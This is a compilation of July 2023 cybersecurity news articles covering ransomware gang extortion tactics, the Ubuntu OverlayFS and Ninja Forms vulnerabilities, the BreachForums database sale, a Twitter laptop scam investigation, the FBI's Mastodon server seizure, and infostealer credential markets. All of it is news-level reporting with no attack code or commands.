This was seen by both the Clop and BlackCat/ALPHV ransomware gangs, who began utilizing new tactics as part of their extortion schemes.

Clop has begun to create clearweb sites to leak data stolen during the MOVEit Transfer attacks, similar to a tactic introduced by ALPHV in 2022.

Using clearweb sites makes it easier to access the stolen data and could allow search engines to index the data and make it more readily available, further applying pressure on victims to have it removed.

At this time, Clop only targets the larger MOVEit victims, likely to avoid the overhead of maintaining so many individual sites.

We also saw a new extortion strategy from BlackCat, who introduced a new data leak API that makes it easy to grab the latest information on who is listed on their data leak site.

This new technique aims to quickly spread awareness of the gang's new victims, hoping it pressures victims into paying a ransom.

Sophos also released new research containing further details on the new Nitrogen initial access malware used by BlackCat.

Finally, we learned more about some recent attacks:

• A MOVEit breach at Maximum exposed the data of up to 11 million people.
• Yamaha was claimed by both Akira and Black Byte.
• Hawai'i Community College paid a ransom to prevent the leak of data.

Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwareforme, @BleepinComputer, @LawrenceAbrams, @demonslay335, @struppigel, @DanielGallagher, @malwrhunterteam, @VK_Intel, @serghei, @fwosar, @Ionut_Ilascu, @FourOctets, @jorntvdw, @PolarToffee, @jgreigj, @BrettCallow, @SophosXOps, @eSentire, @vxunderground, @AlvieriD, and @pcrisk.

July 23rd 2023

Clop now leaks data stolen in MOVEit attacks on clearweb sites

The Clop ransomware gang is copying an ALPHV ransomware gang extortion tactic by creating Internet-accessible websites dedicated to specific victims, making it easier to leak stolen data and further pressuring victims into paying a ransom.

July 24th 2023

Yamaha confirms cyberattack after multiple ransomware gangs claim attacks

Yamaha’s Canadian music division confirmed that it recently dealt with a cyberattack after two different ransomware groups claimed to have attacked the company.

Akira Ransomware: What You Need to Know

Akira ransomware is a new and sophisticated threat that has been targeting organizations in recent months. The ransomware encrypts files on the victim's system and then demands a ransom payment in order to decrypt them

New STOP ransomware variant

PCrisk found a new STOP ransomware variant that appends the .kitu extension.

New Architects ransomware

PCrisk found a new Architects ransomware, which appends the .architects extension and drops a ransom note named readme.txt.

July 26th 2023

New Nitrogen malware pushed via Google Ads for ransomware attacks

A new 'Nitrogen' initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads.

ALPHV ransomware adds data leak API in new extortion strategy

The ALPHV ransomware gang, also referred to as BlackCat, is trying to put more pressure on their victims to pay a ransom by providing an API for their leak site to increase visibility for their attacks.

New STOP ransomware variants

PCrisk found new STOP ransomware variants that append the .wsuu and .wsaz extensions.

July 27th 2023

8 million people hit by data breach at US govt contractor Maximus

U.S. government services contractor Maximus has disclosed a data breach warning that hackers stole the personal data of 8 to 11 million people during the recent MOVEit Transfer data-theft attacks.

New STOP ransomware variant

PCrisk found a new STOP ransomware variant that appends the .wspn extension.

July 28th 2023

Hawai'i Community College pays ransomware gang to prevent data leak

The Hawai?i Community College has admitted that it paid a ransom to ransomware actors to prevent the leaking of stolen data of approximately 28,000 people.

New Black Beserk ransomware

PCrisk found the Black Berserk ransomware, which appends the .Black extension and drops a ransom note named Black_Recover.txt.

That's it for this week! Hope everyone has a nice weekend!

Source

US senator Ron Wyden is calling on three separate bodies to conduct their own investigations into Microsoft following the recent email hacking attack that saw government officials like Commerce Secretary Gina Raimondo and Secretary of State Antony Blinken targeted.

According to Microsoft’s own accounts, a Chinese threat actor that is being tracked as Storm-0558 “gained access to email accounts affecting approximately 25 organizations in the public cloud including government agencies.” Redmond said that related consumer accounts of individuals associated with these affected organizations were also compromised.

In his letter, Senator Wyden likens the attack to the 2020 SolarWinds campaign by a Russian threat actor, during which US government emails were also hacked.

Microsoft may face yet another investigation - or three

Microsoft is already under severe scrutiny in the EU, and has been for years, owing to a number of antitrust and anticompetitive cases. Most recently, the company has come under fire for its unfair cloud practices concerning its Azure platform.

This time, it’s a trio of US agencies that are being asked to launch their own, individual probes into Microsoft.

More specifically, Wyden asked the Cybersecurity and Infrastructure Security Agency (CISA) to investigate whether the company had violated best practices recommended by none other than itself and the National Security Agency (NSA), the Department of Justice whether “Microsoft’s negligent practices violated federal law,” and the Federal Trade Commission (FTC) whether Microsoft “violated federal laws enforced by the [FTC],” particularly around deceptive business practices.

Concluding the letter, Senator Wyden writes: “I also urge you to take all necessary steps to hold the company responsible for any violations of that order."

A company spokesperson told CNBC:

“This incident demonstrates the evolving challenges of cybersecurity in the face of sophisticated attacks. We continue to work directly with government agencies on this issue, and maintain our commitment to continue sharing information at Microsoft Threat Intelligence blog.”

The company did not immediately respond to our request for commentary on the potential threat of three separate probes.

Source

Yesterday, the Have I Been Pwned data breach notification service announced that visitors can check if their information was exposed in a data breach of the Breached cybercrime forum.

"In November 2022, the well-known hacking forum "BreachForums" was itself, breached. Later the following year, the operator of the website was arrested and the site seized by law enforcement agencies," reads the HIBP announcement.

"The breach exposed 212k records including usernames, IP and email addresses, private messages between site members and passwords stored as argon2 hashes."

Breached was a large hacking and data leak forum notorious for hosting, leaking, and selling data stolen from hacked companies, governments, and organizations worldwide.

After the FBI arrested the site's admin Pompompurin in March 2023, the remaining administrator, Baphomet, decided to shut the forum down after believing that law enforcement also had access to the site's servers.

Baphomet later launched a new Breached Forums clone (called in this article BFv2) with another data breach seller known as Shiny Hunters.

A treasure trove of data

The Breached database is currently being sold by a threat actor going by the name 'breached_db_person," who told BleepingComputer they shared the database with Have I Been Pwned to prove its authenticity to potential buyers.

BleepingComputer has also confirmed that known Breached accounts are listed in the shared member's table.

Previous Breached admin Baphomet has also confirmed the authenticity of the database, warning that its sale is part of a "continued campaign attempting to destroy the community."

"Not only was the database submitted to HIBP, but it's being actively sold/leaked by at least one person - even attempting to do so on our forum," warned Baphomet.

"For that reason I'm sure we're going to see it public soon enough. Judging by the 212k users, this is likely an older database months before the closing of BFv1, seeing that my last backup of the forum has 336k users."

Other than law enforcement, the seller said that only they, Baphomet, and Pompompurin have possession of the database.

The threat actor says they are selling the Breached database to only one person for $100,000 - $150,000 and that it contains a snapshot of the entire database taken on November 29th, 2022.

BleepingComputer was told that the database is 2 GB and contains all tables, including those for private messages, payment transactions, and the member database.

While the FBI already revealed that they gained access to the Breached database after they seized the servers, this data can still be valuable for cybersecurity researchers and potentially other threat actors.

The seller, breached_db_person, told BleepingComputer that the private message tables have a lot of incriminating information about forum members and that the 'members' database contains IP addresses showing that many threat actors don't follow good operational security by using residential IP addresses.

The private messages table is valuable as it contains messages sent privately between the different members of the forum, potentially revealing information on past attacks, identities, and other useful information.

Samples of the payments table were shared with BleepingComputer and contain information on payments made to purchase forum ranks (membership levels with extra benefits) and credits (a form of currency used on the forum).

These payments were processed through CoinBase Commerce or Sellix, with the Coinbase transactions including links to order confirmations containing sensitive information, such as cryptocurrency addresses and Coinbase payment IDs.

This cryptocurrency data can be useful to blockchain analytics companies, who can use the cryptocurrency addresses to link threat actors to criminal activity.

Breached and its members have been responsible for a wide range of hacks, extortion attempts, ransomware attacks, and the leaking of stolen data for many companies. These breaches include DC Health Link, Twitter, RobinHood, Acer, Activision, and many more.

Therefore, the private messages could be invaluable for researchers, with the seller stating that they have already been contacted by cybersecurity firms requesting a copy of the data for their own research.

Other threat actors are also showing interest, with the seller saying they received an offer for $250,000.

While it is too soon to tell whether the database will ultimately be sold, even if it is, it would not be surprising for the entire database to be leaked for free in the future.

It is common for data breaches to first be purchased privately and then released later to increase reputation among the data theft community.

Just recently, the seized RaidForums data breach forum also suffered a data breach, and the new BreachedForums clone (BFv2) had its database leaked.

Source

Two vulnerabilities in the Ubuntu implementation of a popular container-based file system allow attackers to execute code with root privileges on 40% of Ubuntu Linux cloud workloads, researchers have found.

The flaws — tracked as CVE-2023-2640 and CVE-2023-32629 and dubbed "GameOverlay" by Wiz researchers — are found in the OverlayFS module of Ubuntu Linux and are the result of changes Ubuntu made to the module in 2018, which, at the time, posed no threat, researchers from cloud security firm Wiz revealed in a blog post.

Both vulnerabilities are easy to exploit; in fact, weaponized exploits for them already are publicly available "given old exploits for past OverlayFS vulnerabilities work out of the box without any changes," Wiz's Sagi Tzadik and Shir Tamari noted in the post.

Linux Kernel Security "Spaghetti"

OverlayFS is a Linux filesystem enabling the deployment of dynamic filesystems based on pre-built images, which has made it a popular choice for container-based cloud environments that run on the open-source OS.

The Linux kernel project modified the OverlayFS module in 2019 and 2022 in ways that conflicted with Ubuntu's 2018 changes. Thus, when Ubuntu adopted the Linux project's changes, it inadvertently created in its version of the OS the two CVEs, one in 2019 (CVE-2023-32629) and the other (CVE-2023-2640) in 2022, the researchers said.

"Both vulnerabilities are unique to Ubuntu kernels since they stemmed from Ubuntu's individual changes to the OverlayFS module," they wrote.

What's more, since the flaws are the result of subtle changes introduced by Ubuntu years ago, it suggests they may not be the only issues lurking in "the shadows of the Linux kernel spaghetti," Wiz CTO and co-founder Ami Luttwak observes in an email to Dark Reading.

How Elevated User Privileges Occur

Ubuntu has patched the flaws, among several others, in a security update released this week. Both flaws, discovered by Tzadik and Tamari, cause OverlayFS running on Ubuntu Linux to fail to perform permission checks properly in certain situations, allowing a local attacker to elevate privileges on the system, according to the update.

The flaws, while separate, create similar exploitable scenarios, yet affect slightly different versions of the kernel. They both affect a feature of OverlayFS that allows the file system to be mounted by any user within a user "namespace," which, in turn, enables the mapping of user and group IDs between the host and a new, separated execution environment, like in a namespace or container. This ensures user isolation and privilege separation in Linux-based cloud deployments.

"When a low-privileged Linux user enters a new user namespace, they are automatically granted all Linux capabilities within that namespace," the researchers wrote. "These capabilities empower them to perform some administrative-like operations, such as mounting a set of filesystems."

Exploiting the flaws allow the creation of specialized executables that, when executed, grant the ability to escalate privileges to "root" on the affected machine. An attacker can then exploit a Linux feature — only available to a root user — called "file capabilities" that grant elevated privileges to executables while they're executed.

"We discovered that it's possible to craft an executable file with scoped file capabilities and trick the Ubuntu Kernel into copying it to a different location with unscoped capabilities, granting anyone who executes it root-like privileges," the researchers wrote.

Linux's Security Dilemma

The vulnerabilities highlight a common issue for Linux, which has remained open source even as its distribution base has grown exponentially, thus making it a bigger target for threat actors, particularly across cloud environments. In fact, the versions of Ubuntu impacted by the flaws are prevalent in the cloud, as they serve as the default OSes for multiple cloud service providers (CSPs), the researchers said.

While open source certainly has its advantages, it also comes with challenges. In this case, since developers have free rein to update the OS code base to suit the particular needs of a deployment, it creates conflict with the Linux kernel that's maintained as the standard, the researchers noted.

"This shows the complex relationship between Linux kernel and distro versions, when both are updating the kernel for different use cases," they wrote. "This complexity introduces … hard-to-predict risks."

Mitigation & Protection for Ubuntu Cloud Vulns

Wiz recommends that security teams of affected Ubuntu-based cloud environments immediately patch workloads affected by the flaws to mitigate risks. They also can apply a simpler mitigation — that is, "restricting OverlayFS to root users only," Raaz Herzberg, head of product, tells Dark Reading.

He advises administrators to refer to Ubuntu's security advisory on each the flaws — and follow steps for mitigation found there. Those instructions can be found here for CVE-2023-32629 and here for CVE-2023-2640.

Overall, administrators of cloud environments should keep all software running in container-based environments up-to-date to mitigate known vulnerabilities, and ensure they have visibility into all of their software assets across the entire cloud to stay on top of patching, Herzberg advises.

They also should limit Internet exposure only to the assets that absolutely need it to perform their essential functions and enforce strict permissions across the environment to limit the attack surface, he adds.

Source

Researchers at Patchstack discovered and disclosed the three vulnerabilities to the plugin's developer, Saturday Drive, on June 22nd, 2023, warning that it affects NinjaForms versions 3.6.25 and older.

The developers released version 3.6.26 on July 4th, 2023, to fix the vulnerabilities. However, WordPress.org stats show that only roughly half of all NinjaForms users have downloaded the latest release, leaving about 400,000 sites vulnerable to attacks.

The vulnerabilities

The first vulnerability discovered by Patchstack is 2CVE-2023-37979, a POST-based reflected XSS (cross-site scripting) flaw that allows unauthenticated users to escalate their privileges and steal information by tricking privileged users into visiting a specially-crafted webpage.

The second and third problems, tracked as CVE-2023-38393 and CVE-2023-38386, respectively, are broken access control issues on the plugin's form submissions export feature, allowing Subscribers and Contributors to export all of the data that users have submitted on the impacted WordPress site.

Although the issues are rated as high-severity, the CVE-2023-38393 is particularly dangerous because a required Subscriber role user is easy to meet.

Any site that supports membership and user registrations would be susceptible to massive data breach incidents due to that flaw if they use a vulnerable Ninja Forms plugin version.

The patches applied by the vendor in version 3.6.26 include adding permission checks for the broken access control issues and function access restrictions that prevent triggering the identified XSS.

Publicly reporting the above flaws was delayed by over three weeks to prevent drawing the attention of hackers to the flaws while allowing Ninja Form users to patch. However, there's still a significant number who haven't at this time.

Patchstack's coverage contains detailed technical information about the three flaws, so exploiting them should be trivial for knowledgeable threat actors.

That said, all website admins who use the Ninja Forms plugin are recommended to update to version 3.6.26 or later as soon as possible. If that is not possible, admins should disable the plugin from their sites until they can apply the patch.

Source

On June 26, a user on a Steam forum alerted other players of Call of Duty: Modern Warfare 2 that hackers “attack using hacked lobbies,” and suggested running an antivirus. The malware mentioned in the thread appears to be on the malware online repository VirusTotal.

Another player claimed to have analyzed the malware and wrote in the same forum thread that the malware appears to be a worm, based on a series of text strings inside the malware. A game industry insider, who asked to remain anonymous because they were not allowed to speak to the press, confirmed that the malware contains those strings, indicating a worm.

Activision spokesperson Neil Wood referred to a tweet posted by the company on an official Call of Duty updates Twitter account, which vaguely acknowledges the malware.

“Multiplayer for Call of Duty: Modern Warfare 2 (2009) on Steam was brought offline while we investigate reports of an issue,” the tweet read.

It’s unclear why the hackers are spreading this malware. The malware is a worm because it appears to spread through online lobbies automatically from one infected player to another. This means the hackers must have found and are exploiting one or multiple bugs in the game to execute malicious code on the other players’ computers.

Call of Duty: Modern Warfare 2 was released by games giant Activision in 2009, but still has a small online community of players. According to a website that tracks the number of players who are playing video games online, there were around 600 people playing the game at the time of writing.

Valve, which runs the Steam platform, did not respond to a request for comment.

While there have been cases of malware distributed through video games, usually this is through trojanized versions of game installers and even cheats.

Source

Embarrassed, angry, victimized. That's just a few of the words my friend uses to describe his recent run-in with a cybercriminal that used a hacked Twitter account to scam people out of hundreds of dollars. Twitter, meanwhile, ignored his pleas for help. That’s when I got involved.

After Tim Utzig lost $1,000 to a fraudster who tricked him using a hacked Twitter account, I asked an expert in social engineering and hunting scammers to help. Ultimately, we tracked down the suspected culprits and identified a network of apparent scammers and money mules expertly swindling people out of their savings. This scamming saga shows how fraudsters use social media, build a network of people to operate different payment accounts, and apply effective techniques to bilk their victims.

It also shows the additional challenges that blind users like Utzig face on the internet and how they are at higher risk of exploitation by indiscriminate online criminals.

Inaccessible and Unacceptable

On May 23, Utzig realized he’d been scammed. He was gearing up for a journalism master’s program at the City University of London and happened to be in the market for a new laptop. By coincidence, someone using the Twitter account of longtime Baltimore sports reporter Roch Kubatko tweeted that they had a new Apple laptop for sale. Utzig trusted Kubatko, whom he’d previously met, and the tweet seemed innocent—and arrived at the perfect moment. So Utzig responded to the tweet with a DM.

Utzig uses a screen reader to navigate the internet and social media apps, including Twitter. A sighted person may have observed oddities in the initial tweet and profile, but the screen reader did nothing to alert Utzig about a key fact: Kubatko’s Twitter account had been hacked, and the person he was talking to wasn’t Kubatko.

“I feel like people with disabilities as a whole are more susceptible to online fraud—screen readers are just one of the methods used by a population who are visually impaired or blind to assist in using technology,” Utzig says. “You’re going to miss certain visual cues that might signify fraud, such as someone changing their profile picture to something different, and the screen reader won’t pick up on it.”

Screen readers also often don’t vocalize misspellings, inaudible grammatical errors, or typography such as fully capitalized words that a sighted person may see as suspicious. And the alternative text on image descriptions, which are manually applied by the individual sharing the content, is the only way a screen reader can describe an image.

Then there’s Twitter itself. Check marks are now effectively useless, especially if you’re blind. Since Twitter changed its verification system under Elon Musk’s ownership, the blue tick that used to be a reliable sign of identity can now be obtained by pretty much anyone. A screen reader will call the Twitter Blue check mark “verified” as before, but the blind user can no longer rely on it as much as they once did.

Recent moves by Twitter concern accessibility advocates. Last year, Twitter laid off its accessibility team, which was responsible for ensuring the platform was usable for people with disabilities, and restrictions on Twitter’s API broke some tools and resources used by blind people. These changes prompted the National Federation of the Blind to move away from Twitter and create a Mastodon server, which the group says is more friendly and accessible for blind users.

“You have people with disabilities scammed, and yet you laid off your whole accessibility team,” Utzig says. “It takes a team to maintain a safe and accessible platform for people with disabilities to use it.”

Then, to top it all off, Twitter is now rebranding as X, with the goal of creating an “everything app” that will apparently also process payments and serve as a “bank.” This, despite the fact that just two months before the X rebranding, the very same platform was being used to swindle people out of their hard-earned cash.

A $1,000 Loss

After a short conversation with not-Kubatko, the person controlling the account asked him for his phone number to send a payment request via Apple Pay. When Utzig followed up after making a payment, he realized the phone number had blocked his number.

Utzig quickly realized he had just paid $1,000 to a criminal. He then reported the account to Twitter. The company did not respond to his requests for help, and the account remained active for days after it was reported as hacked.

Utzig turned to the media for help and reached out to a local reporter. When a local Maryland news station contacted Twitter for comment, the company responded with the poop emoji, the response that press requests have been receiving since March 2023. Utzig says that response made the situation feel so much worse—not only had he lost a lot of money, but the platform he used and loved didn’t care at all about the serious personal and financial impact on its users who were victims of crime.

In the eight months since Musk bought Twitter in October 2022, the platform has increasingly been home to fraudulent accounts. Users across the site have reported a massive uptick in spammers and scammers tweeting, replying to users, and messaging them directly. There have also been multiple reported instances of hacked, high-profile accounts distributing fraudulent content.

Utzig says his DMs are filled with sketchy accounts either sending spam directly or trying to engage in conversation. The social engineering expert I contacted, who asked to use a pseudonym because they carried out this investigation outside their normal work duties, operates several Twitter accounts both for research and personal use. He—let’s call him Steve—says that in the past few months, the number of malicious accounts he observes on the platform has skyrocketed, especially accounts likely associated with pig butchering. This social engineering threat, which is used to drain people’s bank accounts through bogus investment advice, typically originates on social networks and messaging apps and was recently identified by the US Federal Bureau of Investigation as the most costly online threat, with users reporting billions of dollars in losses in 2022.

Social media fraud is part of an ecosystem of online crime that relies on social engineering and trust between users. There are many different kinds of fraud originating on social media, including pig butchering and other financial or cryptocurrency scams, romance scams, and consumer fraud like the kind Utzig experienced.

The attack that hit Kubatko appears similar to a series of related hacks that took over accounts of high-profile Twitter users, and which has been ongoing since at least January of this year. The scammers all used similar language and photos about offering laptops for sale. It is not clear whether the hacked accounts and related scams are all operated by the same people. A search of the language used in the tweet suggests the scammers are still active on the platform. Kubatko, who did not respond to WIRED's request for comment, eventually got his Twitter account back and apologized to Utzig when he learned of the financial loss.

Different scams require different levels of sophistication; for example, hacking Twitter accounts of high-profile users, many of whom may use multi-factor authentication, is typically more difficult than using said accounts to scam users. It is possible the individuals who swindled Utzig are not the ones who initially hacked Kubatko’s account, but they may have purchased access from the original hacker to use as their scamming platform.

Trap and Trace

Steve was enraged that Utzig had been swindled, and offered to help. But all we had was a phone number. So he contacted the number and told the person on the other end that he was interested in buying laptops. Immediately, he received a text from a different number: “Are you looking for laptops?”

Throughout the conversation, Steve said he was willing to pay via Bitcoin, Cash App, or Zelle. Bitcoin wallet information is useful because all transactions are stored on the blockchain, and you can use it to “follow the money” and identify how much money accounts have made. It’s also possible to cross-reference blockchain accounts with other data sets such as open-source reporting or private threat data to identify related fraudulent activity. Cash App and PayPal are also useful data points because users must provide a lot of personal information including phone numbers, email addresses, usernames, and possibly bank accounts. And Zelle is tied to a bank account, making the information very useful to fraud investigators.

Typically, Steve is able to get at least one of these accounts from the threat actors he interacts with—in this case, we got three.

By claiming he didn’t have enough money in one of his accounts, and that another was not working, Steve got the scammers to send him links to multiple payment accounts. The accounts all had different usernames, suggesting they belonged to different people. In fact, Steve was able to link the usernames and phone numbers from the payment apps to three different people and their suspected real names. He found LinkedIn profiles; Twitter, Facebook, TikTok, Snap, and Instagram accounts; Poshmark accounts; dating profiles; a Soundcloud; and personal websites. By pivoting on this data and information provided on their various social and public profiles, Steve was then able to link the individuals to physical addresses in the eastern US.

Steve also sent the scammers Grabify links to see whether we could collect more data on the users. Grabify is used to identify technical characteristics belonging to a user, such as IP addresses, location data, and “user agents” that indicate what type of device they’re clicking from. In this case, one recipient clicked, and we could see they were using an iPhone on the AT&T network and were apparently located in Ohio, providing a possible estimate of where the user was when they clicked the link.

Based on the conversations with the people associated with the various phone numbers and payment accounts, Steve identified at least four individuals involved in this scam ring.

At least one person—Utzig’s original scammer—is the suspected organizer of the fraud, with at least one person who appears to work directly with him, according to Steve’s findings. After Steve received a message from the new, unknown number, he asked the original scammer who this person was. That phone number claimed it was a “business partner.” It had initially been possible there was one person using two different phone numbers involved in the scam. But based on subsequent investigations and conversations with both, Steve identified two likely separate individuals belonging to those numbers.

The “business partner” sent Steve a Cash App screenshot asking for payment that contained a username, which Steve found associated with multiple social media accounts that included photos. One appeared to have a real name attached.

When Steve said he didn’t have enough money in his Cash account, the business partner sent a link to a PayPal account, which used the apparent first and last name of a different real person. The real name and username were linked to multiple social media accounts that all used photos of what appeared to be the same person. Finally, Steve told the business partner his PayPal was not working, and received a name and phone number allegedly belonging to someone’s Zelle account. The business partner claimed this was an “assistant.” By using the details provided, Steve identified yet another individual and their apparent real name who appeared to reside in the same area as our scammers.

It is unclear whether the individuals belonging to the Zelle and PayPal accounts knew about the laptop scam or whether they were just “money mules.” These are accounts that receive money from victims and then funnel it to other accounts belonging to the original scammers. Sometimes money mules are unaware they are moving stolen money and may be unwitting participants in the fraud. Indeed, sometimes money mules are recruited by scammers under the guise of legitimate employment.

Our investigation resulted in us identifying three payment accounts that were at least associated with the laptop scam, dozens of social media profiles potentially belonging to people involved, and three phone numbers with two different area codes belonging to the same state. While this data could end up being useful to a law enforcement fraud investigation, Steve’s open source intelligence gathering serves as a stark reminder of how easily our digital footprints can be traced back to our real-life existence.

A Drop in the Bucket

Local police and the FBI all encourage users to report when they have been victims of online fraud, but victims rarely get the support they need. Utzig filed a police report with the Washington, DC, Metropolitan Police Department, and we reported it to the FBI via the bureau’s Internet Crime Complaint Center. He also contacted his bank and Apple. Unfortunately, using payment apps is the same as sending someone cash. At this point, there is really nothing more Utzig can do—and it’s likely his complaint will just become a drop in a sea of hundreds of thousands of internet crimes reported each year, many of which don’t get any follow-up.

We provided the police with details of our own investigation and reported high-confidence malicious payment accounts to the payment platforms to remove them for fraud. As private citizens, we’ve done all we can, but we hope our investigations can help prevent further exploitation by these threat actors.

While fraud takes place on pretty much every social media platform, Twitter appears to be hosting more hostile accounts now than it had been prior to the sale last year. And not just from scammers. The company fired much of its Trust and Safety staff in December 2022, and in June, Twitter’s recently appointed head of Trust and Safety exited the company. Without the personnel operating the technical guardrails to prevent widespread harassment, exploitation, and cybercrime, such tactics will likely be allowed to proliferate, making the platform less safe. All this as Musk wants Twitter (sorry, I’m not calling it X) to effectively become a financial institution, which requires more user trust than it has ever enjoyed.

Users should be aware of the hallmarks of fraudulent behavior on social media, like receiving messages from strangers, receiving offers to purchase goods and services, and being asked to switch platforms in the middle of a conversation. However, in Utzig’s case, the social platforms themselves could learn a thing or two. Without improvements in screen reading technology and accessibility in general, platforms are enabling exploitation of their more vulnerable users.

Working with my friend to help him report this crime also reminded me that security practitioners often forget there are real human beings on the receiving end of cybercrime, and the emotional and mental toll of being a victim can be huge.

“Billions of dollars in losses” sounds bad. Your friend losing a lot of their savings and feeling violated and betrayed by platforms and people he trusted feels a lot worse.

Source

(May require free registration to view)

Ubuntu is one of the most widely used Linux distributions, especially popular in the U.S., having an approximate user base of over 40 million.

Two recent flaws tracked as CVE-2023-32629 and CVE-2023-2640 discovered by Wiz's researchers S. Tzadik and S. Tamari were recently introduced into the operating system, impacting roughly 40% of Ubuntu's userbase.

CVE-2023-2640 is a high-severity (CVSS v3 score: 7.8) vulnerability in the Ubuntu Linux kernel caused by inadequate permission checks allowing a local attacker to gain elevated privileges.

CVE-2023-32629 is a medium-severity (CVSS v3 score: 5.4) flaw in the Linux kernel memory management subsystem, where a race condition when accessing VMAs may lead to use-after-free, allowing a local attacker to perform arbitrary code execution.

The two analysts found the problems after discovering discrepancies in implementing the OverlayFS module onto the Linux kernel.

OverlayFS is a union mount filesystem implementation targeted by threat actors many times in the past due to allowing unprivileged access via user namespaces and being plagued by easily exploitable bugs.

Ubuntu, as one of the distributions using OverlayFS, had implemented custom changes to its OverlayFS module in 2018, which were generally safe.

However, in 2019 and 2022, the Linux kernel project made its own modifications to the module, which conflicted with Ubuntu's changes.

The widespread distribution adopted the code containing these changes recently, and the conflicts caused the introduction of the two flaws.

Unfortunately, the risk of exploitation is imminent, as PoCs for the two flaws have been publicly available for a long time.

"Both vulnerabilities are unique to Ubuntu kernels since they stemmed from Ubuntu's individual changes to the OverlayFS module," warned the Wiz researchers.

"Weaponized exploits for these vulnerabilities are already publicly available given old exploits for past OverlayFS vulnerabilities work out of the box without any changes."

It should be noted that the two highlighted flaws only impact Ubuntu, and any other Linux distribution, including Ubuntu forks, not using custom modifications of the OverlayFS module should be safe.

Ubuntu has released a security bulletin about the issues and six more vulnerabilities addressed in the latest version of the Ubuntu Linux kernel and has made fixing updates available.

Users who don't know how to reinstall and activate third-party kernel modules are recommended to perform the update via their package manager, which should take care of all dependencies and post-install configurations. 

A reboot is required after installing the updates for the Linux kernel update to take effect on Ubuntu.

Source

Usually, the feds will subpoena a tech company to obtain data on social media users. But in the case of Mastodon—a decentralized social network—the FBI can apparently straight up seize an entire server copy containing thousands of users' data 

The Electronic Frontier Foundation (EFF) is warning(Opens in a new window) about the potential threat after the FBI seized a Mastodon server backup belonging to an "anarchist/anti-colonial" group called Kolektiva. 

The seizure(Opens in a new window) occurred in May, but went largely unreported. The FBI raided a home belonging to a Kolektiva admin as part of an investigation into a local protest, the group said about six weeks after the incident. 

During the raid, the FBI seized a server copy for Kolektiva’s Mastodon instance, which currently has over 8,000 active users. The database contained user account information, including email addresses, possible IP addresses associated with user accounts, and hashed user passwords. In addition, the FBI acquired a copy of the Kolektiva.social(Opens in a new window) database in an unencrypted state since the raid happened while the admin was troubleshooting an issue. 

(Credit: Getty Images)

The EFF says this shows the FBI can sweep up data on numerous people while investigating a single case when it comes to Mastodon. The decentralized social network isn’t controlled by a large corporation out to monetize your data. Instead, anyone can launch a Mastodon server in their home and connect it to others to create a federated social network. 

But the same decentralized nature makes it easier for the feds to swoop in. The EFF adds: "Many fediverse instances, such as Kolektiva, are focused on serving marginalized communities who are disproportionately targeted by law enforcement… Yet this raid put the thousands of users this instance served into a terrible situation.”  

The EFF is now urging both users and Mastodon server operators to take precautions to counter potential FBI seizures. “This story should also be a wake-up call for the thousands of hosts in the growing decentralized web: you have to have your users’ backs too,” the group says. 

The FBI didn’t immediately respond to a request for comment. So it’s unclear if the agency is taking any measures to avoid sifting through user data that's separate from its investigation. In the meantime, the EFF recommends that Mastodon server operators collect as little data as possible.

Mastodon users should also carefully scrutinize the servers they join, and urge the operators to uphold strong privacy safeguards. 

“Making these commitments binding in the terms of service is not only a good idea, it can help the host fight back against overbroad law enforcement requests and can support later motions by defendants to exclude the evidence,” the EFF adds.

Meanwhile, Eugen Rochko, the founder of Mastodon, pointed out: "The FBI performed a raid on one of the admins of kolektiva.social for unrelated charges, and that admin had a backup of the kolektiva.social database on one of their digital devices at home (not a recommended practice, for what it's worth). That Mastodon server is still up. Of course the FBI can take down a Mastodon server in their jurisdiction though, just like they can do with any other website. There's nothing special about Mastodon in that regard, just that taking down one server doesn't affect the rest of the network."

Source

Hundreds of thousands of login credentials and other information needed to access business applications used by major corporations around the world have been found circulating on the dark web. 

This is according to a new report from cybersecurity researchers Flare, which analyzed roughly 20 million logs generated by infostealers, and being sold on the dark web and in the hackers’ Telegram channels.

Logs are packages of information stolen in malware attacks and contain things like passwords stored in browsers, email data, messages from instant messaging platforms, cryptocurrency wallet information, and more. 

In its analysis, Flare discovered some 370,000 logs that offer access to Salesforce, Hubspot, Quickbooks, AWS, DocuSign, and others - all major business applications used by some of the biggest corporations in the world. These apps have hundreds of thousands of users. AWS users were the biggest victims, with almost 200,000 AWS Console credentials being sold on the dark web. There are roughly 65,000 DocuSign and CRM credentials sold, and some 23,000 Salesforce credentials. 

The researchers also found more than 200,000 stealer logs with OpenAI credentials, suggesting that these might leak proprietary information, internal business strategies, or source code, BleepingComputer reports. 

Roughly three-quarters of these logs (74%) were posted on Telegram channels, with the remaining 25% being sold off on Russian-speaking dark web marketplaces. 

"Logs containing corporate access were over-represented on Russian Market and VIP Telegram channels, indicating that the methods attackers use to harvest logs may incidentally or intentionally have more corporate targeting," describes the Flare report.

"Additionally, public Telegram channels may deliberately post lower value logs, saving high-value logs for paying customers."

Analysis: Why does it matter?

There are very few things as valuable in the cybercriminal world as login credentials to business applications used by large corporations. These credentials are extremely highly valued as they grant access to sensitive corporate data, including employee information, customer information, business secrets, future plans, and more. This, in turn, allows the attackers to deploy malware or ransomware, exfiltrate data, or conduct cyber espionage. The data they obtain this way can later be sold off on the black market for significant profits, or it could be leveraged in a ransom demand. 

"Based on evidence from the dark web forum Exploit in, we rate it as highly likely that initial access brokers are using stealer logs as a principal source to gain an initial foothold to corporate environments that can then be auctioned off on top-tier dark web forums," Flare researcher Eric Clay said.

Many cybercriminal groups focus solely on breaking into corporate environments and into business endpoints. After that, they sell the access to their peers who use it for stage-two attacks. These groups are called “initial access brokers”, and rarely engage in information stealing. Those that do will try and deploy some of the world’s most popular info-stealing malware, such as RedLine Stealer, Aurora, or Vidar. 

These tools can be rented out, significantly lowering the barrier for entry and making life a lot more difficult for IT teams looking to keep their virtual premises safe. 

Employees using personal devices to access company files and systems is also a major risk factor. Many of these endpoints are used by other household members who sometimes don’t keep cybersecurity in mind and end up downloading dubious software, cracks, loaders, and torrent files riddled with malware. 

To keep their premises safe, businesses should deploy password managers, enforce multi-factor authentication (MFA), run firewalls, and educate their employees on the dangers of using unvetted software and visiting risky websites. 

What have others said about credential theft? 

Password sharing is another bad practice that put a lot of companies in harm’s way. For example, a 2021 survey in the U.S. found that a third (34%) of adults shared their passwords with coworkers, which translates to some 30 million Americans. Out of 1,500 adults polled for the survey, almost a quarter (22%) admitted reusing the same password on multiple accounts, while just 12% confirmed using a password manager. 

